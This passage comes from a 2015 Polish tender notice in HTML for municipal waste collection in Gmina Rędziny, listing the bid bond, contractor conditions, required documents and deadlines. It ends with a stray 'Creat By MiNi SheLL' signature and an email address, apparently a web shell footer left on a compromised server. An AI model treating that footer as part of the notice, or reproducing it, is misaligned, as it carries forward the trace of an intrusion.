p zapewnienie na czas realizacji przedmiotu zamówienia posiadanie lub dostępność do bazy magazynowo transportowej, usytuowanej i wyposażonej zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości
q umożliwienie wstępu na teren bazy transportowej przedstawicielom Zamawiającego lub pracownikom państwowych instytucji upoważnionych do kontroli realizacji ustawy o odpadach i ustawy o utrzymaniu czystości i porządku w gminach z przepisami wykonawczymi
r udostępnienie co najmniej jednego numeru telefonu w celu szybkiej komunikacji tak aby był możliwy stały kontakt przedstawiciela Zamawiającego z Wykonawcą.
Pełny zakres przedmiotu zamówienia przedstawia załącznik nr 7 do siwz - opis przedmiotu zamówienia ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania, każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  20 000,00  zł słownie dwadzieścia tysięcy złotych 
2.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert - tj. do  dnia  23.02.2015r do godz. 9:00. 
3.  Wadium wniesione przez jednego ze wspólników, uważa się za wniesione prawidłowo.
Forma wadium
1. Wadium może być wnoszone w jednej lub kilku następujących formach:
  pieniądzu;  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;  gwarancjach bankowych;  gwarancjach ubezpieczeniowych;  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu P.A.R.P. ( Dz. U. z 2007 r. Nr 42, poz. 275 ). 
Miejsce i sposób wniesienia wadium
1. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy  Zamawiającego
Bank PKO BP S.A. II O/Cz-wa, konto nr 95 1020 1664 0000 3202 0028 4604  z dopiskiem - Wadium na usługę
 2. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli przed upływem terminu  składania ofert znajdzie się na rachunku bankowym Zamawiającego.
 3. Jeżeli wadium zostanie wniesione w formie, o której mowa w ust. 1 , 
wówczas Wykonawca składa oryginał dokumentu potwierdzającego wniesienie wadium razem z ofertą. Dokument gwarancji lub poręczenia winien zawierać bezwarunkowe i nieodwołalne zobowiązanie gwaranta lub poręczyciela zapłaty wymaganej kwoty wadium, na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium wynikające z zapisów zawartych w art. 46 ust. 4a i ust. 5 ustawy pzp. W dokumencie tym gwarant/poręczyciel nie może uzależniać dokonania zapłaty od spełnienia przez beneficjenta dodatkowych warunków lub czynności. Dopuszczalnym  przez Zamawiającego 
żądaniem gwaranta może być np. żądanie oświadczenia beneficjenta o przyczynach zatrzymania wadium oraz dokumentu potwierdzającego, że osoby, które podpisały wezwanie do zapłaty w imieniu beneficjenta, upoważnione są do  jego reprezentowania.      
 4. Jeżeli wadium zostanie wniesione w pieniądzu - przelewem, Wykonawca dołączy do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. 
 6. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
 7. Wszelkie spory dotyczące gwarancji/poręczenia podlegają rozstrzygnięciu zgodnie z  prawem R P i podlegają kompetencji sądu właściwego dla siedziby  Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków udziału w postepowaniu Wykonawca musi wykazać że posiada:
a)	posiada aktualne zezwolenie na zbieranie i  transport odpadów, wydane przez właściwy organ,
b)	posiada aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Rędziny,
c)	posiada aktualny wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzony przez Głównego Inspektora Ochrony Środowiska.
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postepowaniu wg zasady: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków udziału w postepowaniu Wykonawca musi wykazać, że:
W okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał usługi główne odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, obejmujące wykonanie usług odbierania odpadów komunalnych oraz odbieraniu odpadów segregowanych od łącznie co najmniej 1000 nieruchomości -w jednym zamówieniu.
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postepowaniu wg zasady: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków udziału w postepowaniu Wykonawca musi wykazać, że:
dysponuje lub będzie dysponować w celu wykonania zamówienia samochodami specjalistycznymi i samochodem ciężarowym, spełniającymi wymagania techniczne określone przepisami ustawy prawo o ruchu drogowym oraz innymi przepisami szczególnymi, w ilości:
1. co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych 
z pojemników o pojemności 120 l, 240 l, 360 l, 1100l (typu śmieciarka),
2. co najmniej dwa pojazdy przystosowane do odbierania pojemników (worków) z selektywnie zebranymi odpadami komunalnymi oraz odpadów wielkogabarytowych,
3. co najmniej jeden pojazd mniejszy gabarytowo do odbioru odpadów komunalnych z posesji o utrudnionym dojeździe dla śmieciarki. 
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postepowaniu wg zasady: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest przestawić.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków udziału w postepowaniu Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż posiada: 
1. opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  500.000 zł  słownie: pięćset tysięcy złotych . 
2. własne środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż  500.000 zł. słownie: pięćset tysięcy złotych .
Na potwierdzenie spełnienia powyższego warunku Wykonawca jest zobowiązany dołączyć  do  oferty informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, potwierdzającej   wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy wystawioną nie  wcześniej niż 3  miesiące przed upływem terminu składania  ofert.
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postepowaniu wg zasady: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zgodnie ze specyfikacją przetargową - rozdz. 5 i 6</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płtaności faktury - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmiany postanowień  umowy w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w dniu zawarcia umowy, a zrealizowanie założonego pierwotnie celu umowy byłoby bez tych zmian niemożliwe lub te zmiany są korzystne dla zamawiającego- a w szczególności  w następujących przypadkach:
1.  zmiana strony umowy- tj. następstwo prawne wynikające z odrębnych przepisów;
2.	   zmiana będąca skutkiem poprawy oczywistej omyłki;
3. zmiana terminu wykonania zadania:
a.	konieczność wykonania usług dodatkowych;
b.	przedłużenie procedury przetargowej;
c.	z powodu nieprzewidzianego braku płynności finansowej ZAMAWIAJĄCEGO;
4.	   zmiany płatności i inne:
a.	zmiany wysokości wynagrodzenia brutto w przypadku zmiany w okresie obowiązywania umowy stawki podatku VAT (wartość netto pozostaje bez zmian);
b.	zmiana form płatności;
c.	zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia;
5.	   zmiany osobowe:
a.	Zmiana osób reprezentujących w przypadku zmian organizacyjnych 
b.	Zmiany podwykonawcy przy pomocy którego WYKONAWCA wykonuje przedmiot umowy-  na innego o porównywalnym doświadczeniu, potencjale technicznym i osobowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.redziny.pl-tablica ogłoszeń<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rędziny ul. Wolności 87,  42-242 Rędziny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2015 godzina 09:00, miejsce: Urząd Gminy Rędziny ul. Wolności 87,  42-242 Rędziny - sekretariat urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com